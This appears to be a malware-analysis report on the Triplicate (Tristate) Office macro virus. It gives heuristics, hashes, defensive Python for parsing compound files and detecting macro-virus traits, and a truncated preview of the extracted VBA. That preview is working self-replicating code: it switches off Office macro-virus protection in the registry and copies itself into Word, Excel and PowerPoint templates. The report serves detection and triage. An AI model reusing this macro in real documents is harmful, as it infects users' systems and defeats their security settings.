Verdict: MALICIOUS
Risk Score: 300

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
The analyzer classifies the container as a PowerPoint file; the VBA project it carved is Word code (Document_Close, Options.VirusProtection, NormalTemplate, ActiveDocument) from the Triplicate multi-application macro virus, which ClamAV names Tristate. On document close the macro switches off Word's virus protection, clears the Office 97 (Office\8.0) MacroVirusProtection value for PowerPoint and writes junk values ("Check", "Whoa", "") into Excel's Options6 setting in the current-user hive, the default-user hive and the New User Settings template, then copies its module between the active document, the attached template and Normal.dot using the first-line marker '<!--1nternal-->' to avoid re-infecting. It automates Excel to save a workbook carrying the same code as Book1. in the Excel startup folder, and automates PowerPoint to add a module named Triplicate to Blank Presentation.pot together with an invisible full-slide shape on the slide master whose click action is set to 8 (ppActionRunMacro). ClamAV flags the container as Win.Trojan.Tristate-2 and the extracted macro as Doc.Trojan.Tristate-1, consistent with that family. The template and startup-folder copies are the persistence mechanism; the registry writes only suppress the macro warning when those copies load.
Heuristics (6)

- ClamAV: Win.Trojan.Tristate-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Tristate-2.
- Embedded Office document has suspicious static findings (critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE): a CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive or generic scanner instead of Office.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): the document contains VBA macro code.
- CreateObject call (high, OLE_VBA_CREATEOBJ): the macro calls CreateObject; in the extracted source the targets are Excel.Application and PowerPoint.Application.
- GetObject call (high, OLE_VBA_GETOBJ): the macro calls GetObject.
- CFB header with no readable streams (medium, OLE_PARSE_EMPTY_STREAMS): the file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous; it is seen with truncated or corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
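The two header-level findings above (a valid CFB header whose directory cannot be read, and a second CFB body carved from inside the container at an offset that is not sector-aligned) come down to a handful of header fields. The Python below is an added example, not part of the analyzer's code: it parses the CFB header, checks whether the first directory sector exists within the data and begins with a Root Entry, and scans for further CFB signatures inside the buffer. The inputs are constructed in the block by a minimal compound-file builder; the inner body is placed at 0x1240 to mirror this report's embedded_office_off00001240.ole. The analyzer's own parser and thresholds are not known here, so the checks are this example's own.

```python
import struct

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FREESECT = 0xFFFFFFFF     # also NOSTREAM in directory entries
ENDOFCHAIN = 0xFFFFFFFE
FATSECT = 0xFFFFFFFD
MAXREGSECT = 0xFFFFFFFA   # sector numbers at or above this are reserved markers, not sectors


def build_minimal_cfb(dir_start=1):
    """Construct (for this example) the smallest v3 compound file: a 512-byte header, one FAT
    sector and one directory sector holding only the Root Entry. A dir_start that points
    nowhere yields a header whose directory cannot be read, the OLE_PARSE_EMPTY_STREAMS case."""
    hdr = bytearray(512)
    hdr[0:8] = CFB_MAGIC
    # minor version, major version 3, little-endian marker, 512-byte sectors, 64-byte mini sectors
    struct.pack_into("<HHHHH", hdr, 0x18, 0x003E, 3, 0xFFFE, 9, 6)
    # num dir sectors (0 for v3), num FAT sectors, first dir sector, transaction sig, mini cutoff,
    # first mini-FAT sector, num mini-FAT sectors, first DIFAT sector, num DIFAT sectors
    struct.pack_into("<9I", hdr, 0x28, 0, 1, dir_start, 0, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<I", hdr, 0x4C, 0)                       # DIFAT[0]: the FAT is sector 0
    for i in range(1, 109):
        struct.pack_into("<I", hdr, 0x4C + 4 * i, FREESECT)
    fat = bytearray(struct.pack("<I", FREESECT) * 128)
    struct.pack_into("<II", fat, 0, FATSECT, ENDOFCHAIN)       # sector 0 = FAT, sector 1 = directory
    root = bytearray(128)
    name = "Root Entry".encode("utf-16-le") + b"\x00\x00"
    root[0:len(name)] = name
    struct.pack_into("<HBB", root, 0x40, len(name), 5, 1)      # name length, type 5 = root storage, black
    struct.pack_into("<III", root, 0x44, FREESECT, FREESECT, FREESECT)  # no siblings, no child
    struct.pack_into("<IQ", root, 0x74, ENDOFCHAIN, 0)          # empty mini stream
    return bytes(hdr + fat + root + bytes(128 * 3))             # three unallocated entries


def parse_cfb_header(blob, offset=0):
    """Return the fields needed to locate the directory, or None if no plausible header is at offset."""
    if len(blob) < offset + 512 or blob[offset:offset + 8] != CFB_MAGIC:
        return None
    major, byte_order, sector_shift = struct.unpack_from("<HHH", blob, offset + 0x1A)
    dir_start = struct.unpack_from("<I", blob, offset + 0x30)[0]
    if byte_order != 0xFFFE or (major, sector_shift) not in ((3, 9), (4, 12)):
        return None
    return {"offset": offset, "major": major, "sector_size": 1 << sector_shift, "dir_start": dir_start}


def directory_readable(blob, hdr):
    """True if the first directory sector lies inside the buffer and starts with a Root Entry."""
    if hdr["dir_start"] >= MAXREGSECT:
        return False                       # ENDOFCHAIN / FREESECT where a sector number belongs
    dir_off = hdr["offset"] + (hdr["dir_start"] + 1) * hdr["sector_size"]
    if dir_off + 128 > len(blob):
        return False                       # directory points past the data: truncation or shifting
    name_len, obj_type = struct.unpack_from("<HB", blob, dir_off + 0x40)
    if obj_type != 5 or not 2 <= name_len <= 64:
        return False
    return blob[dir_off:dir_off + name_len - 2].decode("utf-16-le", errors="replace") == "Root Entry"


def find_cfb_signatures(blob):
    """Every offset at which the CFB magic appears, aligned or not."""
    offsets, pos = [], blob.find(CFB_MAGIC)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(CFB_MAGIC, pos + 1)
    return offsets


def triage_cfb(blob):
    """Is the top-level directory readable, and which further CFB bodies sit inside the container?"""
    findings = {"header_valid": False, "directory_readable": False, "embedded": []}
    outer = parse_cfb_header(blob, 0)
    if outer:
        findings["header_valid"] = True
        findings["directory_readable"] = directory_readable(blob, outer)
    for off in find_cfb_signatures(blob):
        inner = parse_cfb_header(blob, off)
        if off == 0 or inner is None:
            continue
        findings["embedded"].append({
            "offset": off,
            "sector_aligned": outer is not None and off % outer["sector_size"] == 0,
            "directory_readable": directory_readable(blob, inner),
        })
    return findings


# Constructed sample: an outer CFB whose header points its directory at ENDOFCHAIN (no readable
# streams) with a complete CFB body at 0x1240, the offset reported for this sample's child.
EMBED_OFFSET = 0x1240
_outer = build_minimal_cfb(dir_start=ENDOFCHAIN)
SAMPLE = _outer + bytes(EMBED_OFFSET - len(_outer)) + build_minimal_cfb()

if __name__ == "__main__":
    print(triage_cfb(SAMPLE))
```

A real carver would go on to walk the FAT chain of the inner body and hand its streams (VBA, WordDocument, PowerPoint Document) to the Office scanners; the point here is that the decision to carve rests on header fields that are cheap to verify and hard for a shifted or truncated container to fake.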
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10045 bytes | af06f7fb54014a31a1b990466f402f905ab7f7c545da5b0712d6cec33ab6d899 | ClamAV: Doc.Trojan.Tristate-1; obfuscation or payload: unlikely |
Preview script (macros.bas): first 1,000 lines of the extracted VBA source

```vb
Attribute VB_Name = "Triplicate"
Public Sub DisableAV()
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
End Sub
'<!--1nternal-->
'Triplicate v0.21 /1nternal
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.DeleteLines 1, AD.CountofLines
AD.InsertLines 1, TT.Lines(1, TT.CountofLines)
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.InsertLines 1, NT.Lines(1, NT.CountofLines)
End If
End If
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
NT.DeleteLines 1, NT.CountofLines
NT.InsertLines 1, AD.Lines(1, AD.CountofLines)
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
End If
xlApp.Quit
Set PPObj = CreateObject("PowerPoint.Application")
Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)
NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
```

... (truncated)
| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| embedded_office_off00001240.ole | embedded-office | Embedded OLE/CFB Office body inside OLE container at offset 0x1240 | 13760 bytes | 2058183bc119e3a15fab0b68f6d14f0c96cee2df27f5edf448497183cdcd5e54 | none listed |
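The extracted macro shows every behaviour a static triage pass for self-replicating Office macros should look for: registry writes that silence the Office 97 macro-virus warning, Options.VirusProtection = False, writes into another project's CodeModule, cross-application CreateObject, a SaveAs into the Excel startup folder, and a first-line infection-marker check. The Python below is an added example, not the analyzer's detection logic: it runs a set of per-line regular-expression rules over decoded VBA source, lists the registry values the macro assigns through System.PrivateProfileString, and derives a verdict. The rule names, patterns and verdict thresholds are this example's own; the malicious input is an excerpt of the macros.bas preview above and the benign input is a constructed macro. Any decoded VBA text, such as olevba output, can be fed to triage_vba.

```python
import re

# Each rule is (tag, pattern); matching is per line so every hit carries a line number.
# Tags, patterns and the verdict logic are this example's own, modelled on the extracted macro.
VBA_RULES = [
    ("auto_exec_handler",
     re.compile(r"\b(Document_(Open|Close|New)|Auto(Open|Close|Exec|New)|Workbook_Open|Auto_Open)\b", re.I)),
    # Office 97 kept the per-application macro-warning switch under Office\8.0; the macro blanks
    # PowerPoint's MacroVirusProtection and writes junk into Excel's Options6.
    ("macro_protection_tamper",
     re.compile(r'PrivateProfileString\(\s*"",\s*"HKEY_[^"]+",\s*"(MacroVirusProtection|Options6)"\s*\)\s*=', re.I)),
    ("word_virus_protection_off", re.compile(r"Options\.VirusProtection\s*=\s*False", re.I)),
    # VBIDE CodeModule methods: a document macro editing VBA programmatically is how a macro virus copies itself.
    ("codemodule_write", re.compile(r"\.(InsertLines|ReplaceLine|AddFromString|DeleteLines)\b", re.I)),
    ("template_target", re.compile(r"\bNormalTemplate\b|Templates\(\d+\)|Blank Presentation\.pot", re.I)),
    ("cross_app_automation",
     re.compile(r'CreateObject\(\s*"(Excel|PowerPoint|Word|Outlook)\.Application"\s*\)', re.I)),
    ("startup_folder_drop", re.compile(r"\bSaveAs\b.*\bStartupPath\b", re.I)),
    ("infection_marker_check", re.compile(r"""Lines\(1,\s*1\)\s*<>\s*"'<!--""")),
]

# key, value name and data of every registry assignment made through System.PrivateProfileString
REG_WRITE = re.compile(
    r'PrivateProfileString\(\s*"",\s*"(HKEY_[^"]+)",\s*"([^"]+)"\s*\)\s*=\s*"([^"]*)"', re.I)


def triage_vba(source):
    """Return {tag: [line numbers]} for every rule that matches a line of decoded VBA source."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for tag, pattern in VBA_RULES:
            if pattern.search(line):
                hits.setdefault(tag, []).append(lineno)
    return hits


def registry_writes(source):
    """(key, value name, data) for each registry write; these are the host-side indicators to hunt for."""
    return [(m.group(1), m.group(2), m.group(3)) for m in REG_WRITE.finditer(source)]


def verdict(hits):
    """A macro that both tampers with the macro warning and writes into a CodeModule is treated
    as self-replicating; tampering on its own is still reported."""
    if "macro_protection_tamper" in hits and "codemodule_write" in hits:
        return "self-replicating macro virus"
    if "macro_protection_tamper" in hits or "word_virus_protection_off" in hits:
        return "macro security tampering"
    return "no indicators"


# Excerpt of the macros.bas preview from this report, used as the malicious input.
MACRO_EXCERPT = r"""Attribute VB_Name = "Triplicate"
Public Sub DisableAV()
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
End Sub
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = False
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.InsertLines 1, NT.Lines(1, NT.CountofLines)
End If
Set xlApp = CreateObject("Excel.Application")
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Set PPObj = CreateObject("PowerPoint.Application")
Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
"""

# Constructed benign macro: no rule should fire.
BENIGN_MACRO = """Attribute VB_Name = "Module1"
Sub Highlight()
    Selection.Font.Bold = True
End Sub
"""

if __name__ == "__main__":
    hits = triage_vba(MACRO_EXCERPT)
    print(verdict(hits))
    for tag, lines in sorted(hits.items()):
        print(f"  {tag}: lines {lines}")
    for key, value_name, data in registry_writes(MACRO_EXCERPT):
        print(f"  registry write: {key}\\{value_name} = {data!r}")
```

The registry tuples double as host indicators: on an Office 97 machine the same keys, plus a Book1. file in the Excel startup folder and a Triplicate module in Blank Presentation.pot, are what an infected host would show.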